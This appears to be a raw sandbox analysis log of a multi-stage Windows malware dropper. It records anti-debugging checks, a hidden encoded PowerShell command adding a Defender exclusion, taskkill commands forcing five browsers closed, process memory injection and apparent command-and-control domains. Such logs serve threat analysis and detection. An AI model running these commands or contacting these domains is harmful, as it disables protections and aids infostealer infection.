Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | Code function: 0_2_04DB0D7B rdtsc 0_2_04DB0D7B
Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_0100E110 LdrInitializeThunk, 9_2_0100E110
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | Code function: 0_2_00B3652B mov eax, dword ptr fs:[00000030h] 0_2_00B3652B
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | Code function: 0_2_00B3A302 mov eax, dword ptr fs:[00000030h] 0_2_00B3A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 2_2_00C0A302 mov eax, dword ptr fs:[00000030h] 2_2_00C0A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 2_2_00C0652B mov eax, dword ptr fs:[00000030h] 2_2_00C0652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 3_2_00C0A302 mov eax, dword ptr fs:[00000030h] 3_2_00C0A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 3_2_00C0652B mov eax, dword ptr fs:[00000030h] 3_2_00C0652B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe | Process created: Base64 decoded Add-MpPreference -ExclusionPath 'C:\Users\hubert\AppData\Roaming\r3yhfqlfwevGCAOVPFS'
Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe | Process created: Base64 decoded Add-MpPreference -ExclusionPath 'C:\Users\hubert\AppData\Roaming\r3yhfqlfwevGCAOVPFS'
Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe | Memory written: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe base: 400000 value starts with: 4D5A
Source: 7620ab885d.exe | String found in binary or memory: tentabatte.lat
Source: 7620ab885d.exe | String found in binary or memory: curverpluch.lat
Source: 7620ab885d.exe | String found in binary or memory: bashfulacid.lat
Source: 7620ab885d.exe | String found in binary or memory: manyrestro.lat
Source: 7620ab885d.exe | String found in binary or memory: slipperyloo.lat
Source: 7620ab885d.exe | String found in binary or memory: talkynicer.lat
Source: 7620ab885d.exe | String found in binary or memory: shapestickyr.lat
Source: 7620ab885d.exe | String found in binary or memory: wordyfindy.lat
Source: 7620ab885d.exe | String found in binary or memory: observerfry.lat
Source: 8469cb4d4d.exe, 0000000A.00000002.2315235248.0000000000741000.00000040.00000001.01000000.0000000A.sdmp | String found in binary or memory: rapeflowwj.lat
Source: 8469cb4d4d.exe, 0000000A.00000002.2315235248.0000000000741000.00000040.00000001.01000000.0000000A.sdmp | String found in binary or memory: crosshuaht.lat
Source: 8469cb4d4d.exe, 0000000A.00000002.2315235248.0000000000741000.00000040.00000001.01000000.0000000A.sdmp | String found in binary or memory: sustainskelet.lat
Source: 8469cb4d4d.exe, 0000000A.00000002.2315235248.0000000000741000.00000040.00000001.01000000.0000000A.sdmp | String found in binary or memory: aspecteirs.lat
Source: 8469cb4d4d.exe, 0000000A.00000002.2315235248.0000000000741000.00000040.00000001.01000000.0000000A.sdmp | String found in binary or memory: energyaffai.lat
Source: 8469cb4d4d.exe, 0000000A.00000002.2315235248.0000000000741000.00000040.00000001.01000000.0000000A.sdmp | String found in binary or memory: necklacebudi.lat
Source: 8469cb4d4d.exe, 0000000A.00000002.2315235248.0000000000741000.00000040.00000001.01000000.0000000A.sdmp | String found in binary or memory: discokeyus.lat
Source: 8469cb4d4d.exe, 0000000A.00000002.2315235248.0000000000741000.00000040.00000001.01000000.0000000A.sdmp | String found in binary or memory: grannyejh.lat
Source: 8469cb4d4d.exe, 0000000A.00000002.2315235248.0000000000741000.00000040.00000001.01000000.0000000A.sdmp | String found in binary or memory: cheapptaxysu.click
Source: 7ddd2a748c.exe, 00000011.00000002.2368631259.0000000002409000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: pancakedipyps.click
Source: b285303eae.exe, 0000001B.00000003.2521099628.0000000004A10000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: steppriflej.xyz
Source: b285303eae.exe, 0000001B.00000003.2521099628.0000000004A10000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: sendypaster.xyz
Source: b285303eae.exe, 0000001B.00000003.2521099628.0000000004A10000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: treehoneyi.click
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe "C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe "C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe "C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe "C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe "C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe "C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe "C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe "C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe "C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe "C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe "C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=
Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe | Process created: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe "C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe"
Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe | Process created: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe "C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe"
Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden -encodedcommand qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaccaqwa6afwavqbzaguacgbzafwaaab1agiazqbyahqaxabbahaacabeageadabhafwaugbvageabqbpag4azwbcahiamwb5aggazgbxagwazgb3aguadgbhaemaqqbpafyauabgafmajwa=
Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden -encodedcommand qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaccaqwa6afwavqbzaguacgbzafwaaab1agiazqbyahqaxabbahaacabeageadabhafwaugbvageabqbpag4azwbcahiamwb5aggazgbxagwazgb3aguadgbhaemaqqbpafyauabgafmajwa=
                    Source: 8469cb4d4d.exe, 0000000A.00000002.2315387552.000000000090E000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: BProgram Manager
                    Source: fb584dabd7.exe, 00000020.00000000.2839375451.0000000001002000.00000002.00000001.01000000.00000019.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: 7620ab885d.exe, 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: GProgram Manager
                    Source: b285303eae.exe, 0000001B.00000002.2818926847.0000000000287000.00000040.00000001.01000000.00000015.sdmpBinary or memory string: Program Manager
                    Source: skotes.exe, skotes.exe, 00000003.00000002.1529104338.0000000000E11000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: WpProgram Manager
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021718001\6b06c8a266.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021718001\6b06c8a266.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021719001\24da220eed.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021719001\24da220eed.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021720001\91732ff836.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021720001\91732ff836.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021721001\f53b3c5fe2.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021721001\f53b3c5fe2.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | Queries volume information: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
